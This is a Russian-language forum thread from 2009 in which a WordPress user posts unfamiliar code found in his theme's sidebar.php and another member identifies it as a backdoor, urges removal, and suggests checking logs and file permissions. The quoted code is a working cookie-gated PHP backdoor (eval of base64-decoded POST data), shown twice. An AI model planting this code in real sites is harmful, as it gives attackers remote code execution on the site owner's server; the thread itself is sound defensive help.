Реклама на сайте Advertise with us

Появился код какой то в вордпрессе

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 30.11.04
Сообщения: 3111
Рейтинг: 2648

Ссылка на сообщениеДобавлено: 05/07/09 в 20:44       Ответить с цитатойцитата 

Никто не знает блог на своем домене щас редактировал sidebar.php и увидел код какой то непонятный
<?php if(md5($_COOKIE['40796c1078c68c4d'])=="42fb664ad9eb3770c1346c5bf812a847"){ eval(base64_decode($_POST['file'])); exit; } ?><?php if(md5($_COOKIE['f9f6dcf5c0c0e602'])=="9a013d00b39c0bdce2e1352e919de9c3"){ eval(base64_decode($_POST['file'])); exit; } ?>
что он делает то? Просто на других смотрел нету такого.

0
 



С нами с 30.11.04
Сообщения: 3111
Рейтинг: 2648

Ссылка на сообщениеДобавлено: 05/07/09 в 21:32       Ответить с цитатойцитата 

Да кстати тема стандартная, щас смотрел в ней такого нет.

0
 



С нами с 13.08.08
Сообщения: 1538
Рейтинг: 1011

Ссылка на сообщениеДобавлено: 05/07/09 в 21:33       Ответить с цитатойцитата 

Tagir писал:
Никто не знает блог на своем домене щас редактировал sidebar.php и увидел код какой то непонятный
<?php if(md5($_COOKIE['40796c1078c68c4d'])=="42fb664ad9eb3770c1346c5bf812a847"){ eval(base64_decode($_POST['file'])); exit; } ?><?php if(md5($_COOKIE['f9f6dcf5c0c0e602'])=="9a013d00b39c0bdce2e1352e919de9c3"){ eval(base64_decode($_POST['file'])); exit; } ?>
что он делает то? Просто на других смотрел нету такого.


Убирай немедленно, ломают тебя. Этот код позволяет выполнить на твоей машине произвольный PHP-код, передаваемый через POST-запрос.

6
 



С нами с 30.11.04
Сообщения: 3111
Рейтинг: 2648

Ссылка на сообщениеДобавлено: 05/07/09 в 21:37       Ответить с цитатойцитата 

Охуеть ты меня напугал icon_biggrin.gif, все снес. Спасибо!

0
 



С нами с 13.08.08
Сообщения: 1538
Рейтинг: 1011

Ссылка на сообщениеДобавлено: 05/07/09 в 21:41       Ответить с цитатойцитата 

Не за что icon_smile.gif На самом деле лучше попытайся выяснить, откуда этот код туда попал. По логам проследи, не менял ли кто файл. Вспомни, не качал ли дистрибутив WP с какого-нибудь левого места. Ну и последствия проверь - все ли работает, не насрали ли где, не удалили ли чего.

0
 



С нами с 30.11.04
Сообщения: 3111
Рейтинг: 2648

Ссылка на сообщениеДобавлено: 05/07/09 в 21:43       Ответить с цитатойцитата 

Я забыл права поменять, т.е. оставил запись.

0
 



С нами с 13.08.08
Сообщения: 1538
Рейтинг: 1011

Ссылка на сообщениеДобавлено: 05/07/09 в 21:45       Ответить с цитатойцитата 

Вот тебе ещё ссылочка до кучи про этот эксплойт, изучай:

http://cssing.org.ua/2008/06/01/wp-footer-exploit/

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »